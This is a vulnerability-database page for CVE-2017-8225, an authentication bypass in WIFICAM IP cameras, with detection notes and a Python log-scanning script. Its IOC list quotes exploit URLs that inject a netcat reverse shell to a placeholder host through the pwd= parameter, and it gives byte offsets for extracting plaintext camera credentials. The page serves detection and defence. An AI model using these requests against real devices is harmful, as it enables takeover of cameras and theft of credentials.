cbcvebase.
CVE-2017-8225
published 2017-04-25

Priority: P188 critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 17.87% (96.8th percentile)

On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.

Detection & IOCs (extracted from sources)

url: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
url: /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
url: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
filename: System.ini

  • Authentication bypass via empty loginuse and loginpas parameters in URI — detect HTTP requests to camera CGI endpoints where both loginuse= and loginpas= are empty strings
  • Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi on GoAhead WIFICAM devices for command injection patterns in the pwd= parameter (e.g., subshell syntax such as $(...) or backticks)
  • Detect unauthenticated access to .ini files (e.g., System.ini) on GoAhead WIFICAM devices — these contain plaintext credentials and should never be publicly accessible
  • Check Point IPS protection name for this CVE: 'Wireless IP Camera (P2P) WIFICAM Cameras Information Disclosure' — use as a signature reference for network IDS/IPS tuning
  • Check Point IPS protection name for associated RCE: 'Wireless IP Camera (P2P) WIFICAM Cameras Remote Code Execution' — use as a signature reference for network IDS/IPS tuning
  • Binary pattern in credential extraction: look for the byte sequence 0x0a 0x0a 0x0a 0x0a 0x01 in HTTP responses from camera devices — credentials are located at fixed offsets (+138 bytes for username, +170 bytes for password) after this marker
  • The exploit hardcodes CAM_PORT 80 as the default attack port, but observed infected GoAhead devices in the wild were found running on port 81 over TCP — scanning/detection should cover both ports
  • The REMOTE_HOST and REMOTE_PORT values in the exploit (192.168.1.1 / 1337) are placeholder defaults; real-world attacks will use attacker-controlled IPs and arbitrary ports for the reverse shell callback
  • The vulnerability affects GoAhead-based Wireless IP Camera (P2P) WIFICAM devices; the same IoTroop/IoTReaper botnet campaign also exploited vulnerabilities in D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, and Synology devices — detections should not be scoped to GoAhead alone
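
The request-level checks from the detection notes above, as an added example (not code from this page or its sources): it flags empty loginuse/loginpas values, .ini file requests, and subshell or backtick syntax in pwd= on the two FTP CGI endpoints. The log lines, addresses, placeholder payload and the names classify_request and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the detection notes above.
FTP_CGI = {"/set_ftp.cgi", "/ftptest.cgi"}
# Subshell syntax $( or a backtick, matched after URL decoding.
SUBSHELL = re.compile(r"\$\(|`")
# Request target inside a common-log-format request line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines: documentation addresses, harmless placeholder payload.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:00:00:01 +0000] "GET /System.ini?loginuse=&loginpas= HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:00:00:05 +0000] "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=x&pwd=%24(placeholder)&dir=/ HTTP/1.1" 200 120',
    '192.0.2.10 - - [01/Jan/2024:00:00:09 +0000] "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=secret HTTP/1.1" 200 90',
]

def classify_request(target):
    """Return a sorted list of findings for one HTTP request target."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # keep_blank_values keeps 'loginuse=&loginpas=' visible as empty strings.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = set()
    if path.endswith(".ini"):
        findings.add("ini-file-access")
    empty = params.get("loginuse") == [""] and params.get("loginpas") == [""]
    if path.endswith((".cgi", ".ini")) and empty:
        findings.add("empty-credentials")
    if path in FTP_CGI and any(SUBSHELL.search(v) for v in params.get("pwd", [])):
        findings.add("pwd-command-injection")
    return sorted(findings)

def scan(lines):
    """Map each flagged source address to the findings seen from it."""
    hits = {}
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        found = classify_request(m.group(1))
        if found:
            hits.setdefault(line.split()[0], []).extend(found)
    return hits

if __name__ == "__main__":
    for src, found in scan(SAMPLE_LOG).items():
        print(src, found)
```

Because the notes above report infected devices on both port 80 and port 81, feed this logs or proxy captures covering both.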

CVSS provenance

nvd, v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
nvd, v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
vulncheck: 9.8 CRITICAL